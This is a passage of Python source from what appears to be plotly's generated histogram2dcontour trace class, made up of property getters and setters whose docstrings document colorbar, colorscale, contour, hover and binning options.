def bingroup(self, val):
self["bingroup"] = val
# coloraxis
# ---------
@property
def coloraxis(self):
"""
Sets a reference to a shared color axis. References to these
shared color axes are "coloraxis", "coloraxis2", "coloraxis3",
etc. Settings for these shared color axes are set in the
layout, under `layout.coloraxis`, `layout.coloraxis2`, etc.
Note that multiple color scales can be linked to the same color
axis.
The 'coloraxis' property is an identifier of a particular
subplot, of type 'coloraxis', that may be specified as the string 'coloraxis'
optionally followed by an integer >= 1
(e.g. 'coloraxis', 'coloraxis1', 'coloraxis2', 'coloraxis3', etc.)
Returns
-------
str
"""
return self["coloraxis"]
@coloraxis.setter
def coloraxis(self, val):
self["coloraxis"] = val
# colorbar
# --------
@property
def colorbar(self):
"""
The 'colorbar' property is an instance of ColorBar
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.ColorBar`
- A dict of string/value properties that will be passed
to the ColorBar constructor
Supported dict properties:
bgcolor
Sets the color of padded area.
bordercolor
Sets the axis line color.
borderwidth
Sets the width (in px) or the border enclosing
this color bar.
dtick
Sets the step in-between ticks on this axis.
Use with `tick0`. Must be a positive number, or
special strings available to "log" and "date"
axes. If the axis `type` is "log", then ticks
are set every 10^(n*dtick) where n is the tick
number. For example, to set a tick mark at 1,
10, 100, 1000, ... set dtick to 1. To set tick
marks at 1, 100, 10000, ... set dtick to 2. To
set tick marks at 1, 5, 25, 125, 625, 3125, ...
set dtick to log_10(5), or 0.69897000433. "log"
has several special values; "L<f>", where `f`
is a positive number, gives ticks linearly
spaced in value (but not position). For example
`tick0` = 0.1, `dtick` = "L0.5" will put ticks
at 0.1, 0.6, 1.1, 1.6 etc. To show powers of 10
plus small digits between, use "D1" (all
digits) or "D2" (only 2 and 5). `tick0` is
ignored for "D1" and "D2". If the axis `type`
is "date", then you must convert the time to
milliseconds. For example, to set the interval
between ticks to one day, set `dtick` to
86400000.0. "date" also has special values
"M<n>" gives ticks spaced by a number of
months. `n` must be a positive integer. To set
ticks on the 15th of every third month, set
`tick0` to "2000-01-15" and `dtick` to "M3". To
set ticks every 4 years, set `dtick` to "M48"
exponentformat
Determines a formatting rule for the tick
exponents. For example, consider the number
1,000,000,000. If "none", it appears as
1,000,000,000. If "e", 1e+9. If "E", 1E+9. If
"power", 1x10^9 (with 9 in a super script). If
"SI", 1G. If "B", 1B.
len
Sets the length of the color bar This measure
excludes the padding of both ends. That is, the
color bar length is this length minus the
padding on both ends.
lenmode
Determines whether this color bar's length
(i.e. the measure in the color variation
direction) is set in units of plot "fraction"
or in *pixels. Use `len` to set the value.
minexponent
Hide SI prefix for 10^n if |n| is below this
number. This only has an effect when
`tickformat` is "SI" or "B".
nticks
Specifies the maximum number of ticks for the
particular axis. The actual number of ticks
will be chosen automatically to be less than or
equal to `nticks`. Has an effect only if
`tickmode` is set to "auto".
orientation
Sets the orientation of the colorbar.
outlinecolor
Sets the axis line color.
outlinewidth
Sets the width (in px) of the axis line.
separatethousands
If "true", even 4-digit integers are separated
showexponent
If "all", all exponents are shown besides their
significands. If "first", only the exponent of
the first tick is shown. If "last", only the
exponent of the last tick is shown. If "none",
no exponents appear.
showticklabels
Determines whether or not the tick labels are
drawn.
showtickprefix
If "all", all tick labels are displayed with a
prefix. If "first", only the first tick is
displayed with a prefix. If "last", only the
last tick is displayed with a suffix. If
"none", tick prefixes are hidden.
showticksuffix
Same as `showtickprefix` but for tick suffixes.
thickness
Sets the thickness of the color bar This
measure excludes the size of the padding, ticks
and labels.
thicknessmode
Determines whether this color bar's thickness
(i.e. the measure in the constant color
direction) is set in units of plot "fraction"
or in "pixels". Use `thickness` to set the
value.
tick0
Sets the placement of the first tick on this
axis. Use with `dtick`. If the axis `type` is
"log", then you must take the log of your
starting tick (e.g. to set the starting tick to
100, set the `tick0` to 2) except when
`dtick`=*L<f>* (see `dtick` for more info). If
the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/tree/v1.4.5#d3-f
ormat. And for dates see:
https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format. We add two
items to d3's date formatter: "%h" for half of
the year as a decimal number as well as "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
A tuple of :class:`plotly.graph_objects.histogr
am2dcontour.colorbar.Tickformatstop` instances
or dicts with compatible properties
tickformatstopdefaults
When used in a template (as layout.template.dat
a.histogram2dcontour.colorbar.tickformatstopdef
aults), sets the default property values to use
for elements of
histogram2dcontour.colorbar.tickformatstops
ticklabeloverflow
Determines how we handle tick labels that would
overflow either the graph div or the domain of
the axis. The default value for inside tick
labels is *hide past domain*. In other cases
the default is *hide past div*.
ticklabelposition
Determines where tick labels are drawn relative
to the ticks. Left and right options are used
when `orientation` is "h", top and bottom when
`orientation` is "v".
ticklabelstep
Sets the spacing between tick labels as
compared to the spacing between ticks. A value
of 1 (default) means each tick gets a label. A
value of 2 means shows every 2nd label. A
larger value n means only every nth tick is
labeled. `tick0` determines which labels are
shown. Not implemented for axes with `type`
"log" or "multicategory", or when `tickmode` is
"array".
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on Chart Studio Cloud
for `ticktext`.
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on Chart Studio Cloud
for `tickvals`.
tickwidth
Sets the tick width (in px).
title
:class:`plotly.graph_objects.histogram2dcontour
.colorbar.Title` instance or dict with
compatible properties
titlefont
Deprecated: Please use
histogram2dcontour.colorbar.title.font instead.
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
titleside
Deprecated: Please use
histogram2dcontour.colorbar.title.side instead.
Determines the location of color bar's title
with respect to the color bar. Defaults to
"top" when `orientation` if "v" and defaults
to "right" when `orientation` if "h". Note that
the title's location used to be set by the now
deprecated `titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction). Defaults to 1.02 when `orientation`
is "v" and 0.5 when `orientation` is "h".
xanchor
Sets this color bar's horizontal position
anchor. This anchor binds the `x` position to
the "left", "center" or "right" of the color
bar. Defaults to "left" when `orientation` is
"v" and "center" when `orientation` is "h".
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction). Defaults to 0.5 when `orientation`
is "v" and 1.02 when `orientation` is "h".
yanchor
Sets this color bar's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the color bar.
Defaults to "middle" when `orientation` is "v"
and "bottom" when `orientation` is "h".
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
plotly.graph_objs.histogram2dcontour.ColorBar
"""
return self["colorbar"]
@colorbar.setter
def colorbar(self, val):
self["colorbar"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. The colorscale must be an array containing
arrays mapping a normalized value to an rgb, rgba, hex, hsl,
hsv, or named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the
bounds of the colorscale in color space, use `zmin` and `zmax`.
Alternatively, `colorscale` may be a palette name string of the
following list: Blackbody,Bluered,Blues,Cividis,Earth,Electric,
Greens,Greys,Hot,Jet,Picnic,Portland,Rainbow,RdBu,Reds,Viridis,
YlGnBu,YlOrRd.
The 'colorscale' property is a colorscale and may be
specified as:
- A list of colors that will be spaced evenly to create the colorscale.
Many predefined colorscale lists are included in the sequential, diverging,
and cyclical modules in the plotly.colors package.
- A list of 2-element lists where the first element is the
normalized color level value (starting at 0 and ending at 1),
and the second item is a valid color string.
(e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
- One of the following named colorscales:
['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
'orrd', 'oryel', 'oxy', 'peach', 'phase', 'picnic', 'pinkyl',
'piyg', 'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn',
'puor', 'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu',
'rdgy', 'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar',
'spectral', 'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn',
'tealrose', 'tempo', 'temps', 'thermal', 'tropic', 'turbid',
'turbo', 'twilight', 'viridis', 'ylgn', 'ylgnbu', 'ylorbr',
'ylorrd'].
Appending '_r' to a named colorscale reverses it.
Returns
-------
str
"""
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
# contours
# --------
@property
def contours(self):
"""
The 'contours' property is an instance of Contours
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Contours`
- A dict of string/value properties that will be passed
to the Contours constructor
Supported dict properties:
coloring
Determines the coloring method showing the
contour values. If "fill", coloring is done
evenly between each contour level If "heatmap",
a heatmap gradient coloring is applied between
each contour level. If "lines", coloring is
done on the contour lines. If "none", no
coloring is applied on this trace.
end
Sets the end contour level value. Must be more
than `contours.start`
labelfont
Sets the font used for labeling the contour
levels. The default color comes from the lines,
if shown. The default family and size come from
`layout.font`.
labelformat
Sets the contour label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see: h
ttps://github.com/d3/d3-format/tree/v1.4.5#d3-f
ormat.
operation
Sets the constraint operation. "=" keeps
regions equal to `value` "<" and "<=" keep
regions less than `value` ">" and ">=" keep
regions greater than `value` "[]", "()", "[)",
and "(]" keep regions inside `value[0]` to
`value[1]` "][", ")(", "](", ")[" keep regions
outside `value[0]` to value[1]` Open vs. closed
intervals make no difference to constraint
display, but all versions are allowed for
consistency with filter transforms.
showlabels
Determines whether to label the contour lines
with their values.
showlines
Determines whether or not the contour lines are
drawn. Has an effect only if
`contours.coloring` is set to "fill".
size
Sets the step between each contour level. Must
be positive.
start
Sets the starting contour level value. Must be
less than `contours.end`
type
If `levels`, the data is represented as a
contour plot with multiple levels displayed. If
`constraint`, the data is represented as
constraints with the invalid region shaded as
specified by the `operation` and `value`
parameters.
value
Sets the value or values of the constraint
boundary. When `operation` is set to one of the
comparison values (=,<,>=,>,<=) "value" is
expected to be a number. When `operation` is
set to one of the interval values
([],(),[),(],][,)(,](,)[) "value" is expected
to be an array of two numbers where the first
is the lower bound and the second is the upper
bound.
Returns
-------
plotly.graph_objs.histogram2dcontour.Contours
"""
return self["contours"]
@contours.setter
def contours(self, val):
self["contours"] = val
# customdata
# ----------
@property
def customdata(self):
"""
Assigns extra data each datum. This may be useful when
listening to hover, click and selection events. Note that,
"scatter" traces also appends customdata items in the markers
DOM elements
The 'customdata' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["customdata"]
@customdata.setter
def customdata(self, val):
self["customdata"] = val
# customdatasrc
# -------------
@property
def customdatasrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`customdata`.
The 'customdatasrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["customdatasrc"]
@customdatasrc.setter
def customdatasrc(self, val):
self["customdatasrc"] = val
# histfunc
# --------
@property
def histfunc(self):
"""
Specifies the binning function used for this histogram trace.
If "count", the histogram values are computed by counting the
number of values lying inside each bin. If "sum", "avg", "min",
"max", the histogram values are computed using the sum, the
average, the minimum or the maximum of the values lying inside
each bin respectively.
The 'histfunc' property is an enumeration that may be specified as:
- One of the following enumeration values:
['count', 'sum', 'avg', 'min', 'max']
Returns
-------
Any
"""
return self["histfunc"]
@histfunc.setter
def histfunc(self, val):
self["histfunc"] = val
# histnorm
# --------
@property
def histnorm(self):
"""
Specifies the type of normalization used for this histogram
trace. If "", the span of each bar corresponds to the number of
occurrences (i.e. the number of data points lying inside the
bins). If "percent" / "probability", the span of each bar
corresponds to the percentage / fraction of occurrences with
respect to the total number of sample points (here, the sum of
all bin HEIGHTS equals 100% / 1). If "density", the span of
each bar corresponds to the number of occurrences in a bin
divided by the size of the bin interval (here, the sum of all
bin AREAS equals the total number of sample points). If
*probability density*, the area of each bar corresponds to the
probability that an event will fall into the corresponding bin
(here, the sum of all bin AREAS equals 1).
The 'histnorm' property is an enumeration that may be specified as:
- One of the following enumeration values:
['', 'percent', 'probability', 'density', 'probability
density']
Returns
-------
Any
"""
return self["histnorm"]
@histnorm.setter
def histnorm(self, val):
self["histnorm"] = val
# hoverinfo
# ---------
@property
def hoverinfo(self):
"""
Determines which trace information appear on hover. If `none`
or `skip` are set, no information is displayed upon hovering.
But, if `none` is set, click and hover events are still fired.
The 'hoverinfo' property is a flaglist and may be specified
as a string containing:
- Any combination of ['x', 'y', 'z', 'text', 'name'] joined with '+' characters
(e.g. 'x+y')
OR exactly one of ['all', 'none', 'skip'] (e.g. 'skip')
- A list or array of the above
Returns
-------
Any|numpy.ndarray
"""
return self["hoverinfo"]
@hoverinfo.setter
def hoverinfo(self, val):
self["hoverinfo"] = val
# hoverinfosrc
# ------------
@property
def hoverinfosrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`hoverinfo`.
The 'hoverinfosrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["hoverinfosrc"]
@hoverinfosrc.setter
def hoverinfosrc(self, val):
self["hoverinfosrc"] = val
# hoverlabel
# ----------
@property
def hoverlabel(self):
"""
The 'hoverlabel' property is an instance of Hoverlabel
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Hoverlabel`
- A dict of string/value properties that will be passed
to the Hoverlabel constructor
Supported dict properties:
align
Sets the horizontal alignment of the text
content within hover label box. Has an effect
only if the hover label text spans more two or
more lines
alignsrc
Sets the source reference on Chart Studio Cloud
for `align`.
bgcolor
Sets the background color of the hover labels
for this trace
bgcolorsrc
Sets the source reference on Chart Studio Cloud
for `bgcolor`.
bordercolor
Sets the border color of the hover labels for
this trace.
bordercolorsrc
Sets the source reference on Chart Studio Cloud
for `bordercolor`.
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of
characters) of the trace name in the hover
labels for all traces. -1 shows the whole name
regardless of length. 0-3 shows the first 0-3
characters, and an integer >3 will show the
whole name if it is less than that many
characters, but if it is longer, will truncate
to `namelength - 3` characters and add an
ellipsis.
namelengthsrc
Sets the source reference on Chart Studio Cloud
for `namelength`.
Returns
-------
plotly.graph_objs.histogram2dcontour.Hoverlabel
"""
return self["hoverlabel"]
@hoverlabel.setter
def hoverlabel(self, val):
self["hoverlabel"] = val
# hovertemplate
# -------------
@property
def hovertemplate(self):
"""
Template string used for rendering the information that appear
on hover box. Note that this will override `hoverinfo`.
Variables are inserted using %{variable}, for example "y: %{y}"
as well as %{xother}, {%_xother}, {%_xother_}, {%xother_}. When
showing info for several points, "xother" will be added to
those with different x positions from the first point. An
underscore before or after "(x|y)other" will add a space on
that side, only when this field is shown. Numbers are formatted
using d3-format's syntax %{variable:d3-format}, for example
"Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format for
details on the formatting syntax. Dates are formatted using
d3-time-format's syntax %{variable|d3-time-format}, for example
"Day: %{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the date
formatting syntax. The variables available in `hovertemplate`
are the ones emitted as event data described at this link
https://plotly.com/javascript/plotlyjs-events/#event-data.
Additionally, every attributes that can be specified per-point
(the ones that are `arrayOk: true`) are available. variable `z`
Anything contained in tag `<extra>` is displayed in the
secondary box, for example "<extra>{fullData.name}</extra>". To
hide the secondary box completely, use an empty tag
`<extra></extra>`.
The 'hovertemplate' property is a string and must be specified as:
- A string
- A number that will be converted to a string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["hovertemplate"]
@hovertemplate.setter
def hovertemplate(self, val):
self["hovertemplate"] = val
# hovertemplatesrc
# ----------------
@property
def hovertemplatesrc(self):
"""
Sets the source reference on Chart Studio Cloud for
`hovertemplate`.
The 'hovertemplatesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["hovertemplatesrc"]
@hovertemplatesrc.setter
def hovertemplatesrc(self, val):
self["hovertemplatesrc"] = val
# ids
# ---
@property
def ids(self):
"""
Assigns id labels to each datum. These ids for object constancy
of data points during animation. Should be an array of strings,
not numbers or any other type.
The 'ids' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["ids"]
@ids.setter
def ids(self, val):
self["ids"] = val
# idssrc
# ------
@property
def idssrc(self):
"""
Sets the source reference on Chart Studio Cloud for `ids`.
The 'idssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["idssrc"]
@idssrc.setter
def idssrc(self, val):
self["idssrc"] = val
# legendgroup
# -----------
@property
def legendgroup(self):
"""
Sets the legend group for this trace. Traces part of the same
legend group hide/show at the same time when toggling legend
items.
The 'legendgroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["legendgroup"]
@legendgroup.setter
def legendgroup(self, val):
self["legendgroup"] = val
# legendgrouptitle
# ----------------
@property
def legendgrouptitle(self):
"""
The 'legendgrouptitle' property is an instance of Legendgrouptitle
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Legendgrouptitle`
- A dict of string/value properties that will be passed
to the Legendgrouptitle constructor
Supported dict properties:
font
Sets this legend group's title font.
text
Sets the title of the legend group.
Returns
-------
plotly.graph_objs.histogram2dcontour.Legendgrouptitle
"""
return self["legendgrouptitle"]
@legendgrouptitle.setter
def legendgrouptitle(self, val):
self["legendgrouptitle"] = val
# legendrank
# ----------
@property
def legendrank(self):
"""
Sets the legend rank for this trace. Items and groups with
smaller ranks are presented on top/left side while with
`*reversed* `legend.traceorder` they are on bottom/right side.
The default legendrank is 1000, so that you can use ranks less
than 1000 to place certain items before all unranked items, and
ranks greater than 1000 to go after all unranked items.
The 'legendrank' property is a number and may be specified as:
- An int or float
Returns
-------
int|float
"""
return self["legendrank"]
@legendrank.setter
def legendrank(self, val):
self["legendrank"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Line`
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of the contour level. Has no
effect if `contours.coloring` is set to
"lines".
dash
Sets the dash style of lines. Set to a dash
type string ("solid", "dot", "dash",
"longdash", "dashdot", or "longdashdot") or a
dash length list in px (eg "5px,10px,2px,2px").
smoothing
Sets the amount of smoothing for the contour
lines, where 0 corresponds to no smoothing.
width
Sets the contour line width in (in px)
Returns
-------
plotly.graph_objs.histogram2dcontour.Line
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# marker
# ------
@property
def marker(self):
"""
The 'marker' property is an instance of Marker
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Marker`
- A dict of string/value properties that will be passed
to the Marker constructor
Supported dict properties:
color
Sets the aggregation data.
colorsrc
Sets the source reference on Chart Studio Cloud
for `color`.
Returns
-------
plotly.graph_objs.histogram2dcontour.Marker
"""
return self["marker"]
@marker.setter
def marker(self, val):
self["marker"] = val
# meta
# ----
@property
def meta(self):
"""
Assigns extra meta information associated with this trace that
can be used in various text attributes. Attributes such as
trace `name`, graph, axis and colorbar `title.text`, annotation
`text` `rangeselector`, `updatemenues` and `sliders` `label`
text all support `meta`. To access the trace `meta` values in
an attribute in the same trace, simply use `%{meta[i]}` where
`i` is the index or key of the `meta` item in question. To
access trace `meta` in layout attributes, use
`%{data[n[.meta[i]}` where `i` is the index or key of the
`meta` and `n` is the trace index.
The 'meta' property accepts values of any type
Returns
-------
Any|numpy.ndarray
"""
return self["meta"]
@meta.setter
def meta(self, val):
self["meta"] = val
# metasrc
# -------
@property
def metasrc(self):
"""
Sets the source reference on Chart Studio Cloud for `meta`.
The 'metasrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["metasrc"]
@metasrc.setter
def metasrc(self, val):
self["metasrc"] = val
# name
# ----
@property
def name(self):
"""
Sets the trace name. The trace name appear as the legend item
and on hover.
The 'name' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["name"]
@name.setter
def name(self, val):
self["name"] = val
# nbinsx
# ------
@property
def nbinsx(self):
"""
Specifies the maximum number of desired bins. This value will
be used in an algorithm that will decide the optimal bin size
such that the histogram best visualizes the distribution of the
data. Ignored if `xbins.size` is provided.
The 'nbinsx' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["nbinsx"]
@nbinsx.setter
def nbinsx(self, val):
self["nbinsx"] = val
# nbinsy
# ------
@property
def nbinsy(self):
"""
Specifies the maximum number of desired bins. This value will
be used in an algorithm that will decide the optimal bin size
such that the histogram best visualizes the distribution of the
data. Ignored if `ybins.size` is provided.
The 'nbinsy' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["nbinsy"]
@nbinsy.setter
def nbinsy(self, val):
self["nbinsy"] = val
# ncontours
# ---------
@property
def ncontours(self):
"""
Sets the maximum number of contour levels. The actual number of
contours will be chosen automatically to be less than or equal
to the value of `ncontours`. Has an effect only if
`autocontour` is True or if `contours.size` is missing.
The 'ncontours' property is a integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [1, 9223372036854775807]
Returns
-------
int
"""
return self["ncontours"]
@ncontours.setter
def ncontours(self, val):
self["ncontours"] = val
# opacity
# -------
@property
def opacity(self):
"""
Sets the opacity of the trace.
The 'opacity' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
int|float
"""
return self["opacity"]
@opacity.setter
def opacity(self, val):
self["opacity"] = val
# reversescale
# ------------
@property
def reversescale(self):
"""
Reverses the color mapping if true. If true, `zmin` will
correspond to the last color in the array and `zmax` will
correspond to the first color.
The 'reversescale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
# showlegend
# ----------
@property
def showlegend(self):
"""
Determines whether or not an item corresponding to this trace
is shown in the legend.
The 'showlegend' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showlegend"]
@showlegend.setter
def showlegend(self, val):
self["showlegend"] = val
# showscale
# ---------
@property
def showscale(self):
"""
Determines whether or not a colorbar is displayed for this
trace.
The 'showscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showscale"]
@showscale.setter
def showscale(self, val):
self["showscale"] = val
# stream
# ------
@property
def stream(self):
"""
The 'stream' property is an instance of Stream
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Stream`
- A dict of string/value properties that will be passed
to the Stream constructor
Supported dict properties:
maxpoints
Sets the maximum number of points to keep on
the plots from an incoming stream. If
`maxpoints` is set to 50, only the newest 50
points will be displayed on the plot.
token
The stream id number links a data trace on a
plot with a stream. See https://chart-
studio.plotly.com/settings for more details.
Returns
-------
plotly.graph_objs.histogram2dcontour.Stream
"""
return self["stream"]
@stream.setter
def stream(self, val):
self["stream"] = val
# textfont
# --------
@property
def textfont(self):
"""
For this trace it only has an effect if `coloring` is set to
"heatmap". Sets the text font.
The 'textfont' property is an instance of Textfont
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.Textfont`
- A dict of string/value properties that will be passed
to the Textfont constructor
Supported dict properties:
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
Returns
-------
plotly.graph_objs.histogram2dcontour.Textfont
"""
return self["textfont"]
@textfont.setter
def textfont(self, val):
self["textfont"] = val
# texttemplate
# ------------
@property
def texttemplate(self):
"""
For this trace it only has an effect if `coloring` is set to
"heatmap". Template string used for rendering the information
text that appear on points. Note that this will override
`textinfo`. Variables are inserted using %{variable}, for
example "y: %{y}". Numbers are formatted using d3-format's
syntax %{variable:d3-format}, for example "Price: %{y:$.2f}".
https://github.com/d3/d3-format/tree/v1.4.5#d3-format for
details on the formatting syntax. Dates are formatted using
d3-time-format's syntax %{variable|d3-time-format}, for example
"Day: %{2019-01-01|%A}". https://github.com/d3/d3-time-
format/tree/v2.2.3#locale_format for details on the date
formatting syntax. Every attributes that can be specified per-
point (the ones that are `arrayOk: true`) are available.
variables `x`, `y`, `z` and `text`.
The 'texttemplate' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["texttemplate"]
@texttemplate.setter
def texttemplate(self, val):
self["texttemplate"] = val
# uid
# ---
@property
def uid(self):
"""
Assign an id to this trace, Use this to provide object
constancy between traces during animations and transitions.
The 'uid' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["uid"]
@uid.setter
def uid(self, val):
self["uid"] = val
# uirevision
# ----------
@property
def uirevision(self):
"""
Controls persistence of some user-driven changes to the trace:
`constraintrange` in `parcoords` traces, as well as some
`editable: true` modifications such as `name` and
`colorbar.title`. Defaults to `layout.uirevision`. Note that
other user-driven trace attribute changes are controlled by
`layout` attributes: `trace.visible` is controlled by
`layout.legend.uirevision`, `selectedpoints` is controlled by
`layout.selectionrevision`, and `colorbar.(x|y)` (accessible
with `config: {editable: true}`) is controlled by
`layout.editrevision`. Trace changes are tracked by `uid`,
which only falls back on trace index if no `uid` is provided.
So if your app can add/remove traces before the end of the
`data` array, such that the same trace has a different index,
you can still preserve user-driven changes if you give each
trace a `uid` that stays with it as it moves.
The 'uirevision' property accepts values of any type
Returns
-------
Any
"""
return self["uirevision"]
@uirevision.setter
def uirevision(self, val):
self["uirevision"] = val
# visible
# -------
@property
def visible(self):
"""
Determines whether or not this trace is visible. If
"legendonly", the trace is not drawn, but can appear as a
legend item (provided that the legend itself is visible).
The 'visible' property is an enumeration that may be specified as:
- One of the following enumeration values:
[True, False, 'legendonly']
Returns
-------
Any
"""
return self["visible"]
@visible.setter
def visible(self, val):
self["visible"] = val
# x
# -
@property
def x(self):
"""
Sets the sample data to be binned on the x axis.
The 'x' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# xaxis
# -----
@property
def xaxis(self):
"""
Sets a reference between this trace's x coordinates and a 2D
cartesian x axis. If "x" (the default value), the x coordinates
refer to `layout.xaxis`. If "x2", the x coordinates refer to
`layout.xaxis2`, and so on.
The 'xaxis' property is an identifier of a particular
subplot, of type 'x', that may be specified as the string 'x'
optionally followed by an integer >= 1
(e.g. 'x', 'x1', 'x2', 'x3', etc.)
Returns
-------
str
"""
return self["xaxis"]
@xaxis.setter
def xaxis(self, val):
self["xaxis"] = val
# xbingroup
# ---------
@property
def xbingroup(self):
"""
Set a group of histogram traces which will have compatible
x-bin settings. Using `xbingroup`, histogram2d and
histogram2dcontour traces (on axes of the same axis type) can
have compatible x-bin settings. Note that the same `xbingroup`
value can be used to set (1D) histogram `bingroup`
The 'xbingroup' property is a string and must be specified as:
- A string
- A number that will be converted to a string
Returns
-------
str
"""
return self["xbingroup"]
@xbingroup.setter
def xbingroup(self, val):
self["xbingroup"] = val
# xbins
# -----
@property
def xbins(self):
"""
The 'xbins' property is an instance of XBins
that may be specified as:
- An instance of :class:`plotly.graph_objs.histogram2dcontour.XBins`
- A dict of string/value properties that will be passed
to the XBins constructor
Supported dict properties:
end
Sets the end value for the x axis bins. The
last bin may not end exactly at this value, we
increment the bin edge by `size` from `start`
until we reach or exceed `end`. Defaults to the
maximum data value. Like `start`, for dates use
a date string, and for category data `end` is
based on the category serial numbers.
size
Sets the size of each x axis bin. Default
behavior: If `nbinsx` is 0 or omitted, we
choose a nice round bin size such that the
number of bins is about the same as the typical
number of samples in each bin. If `nbinsx` is
provided, we choose a nice round bin size
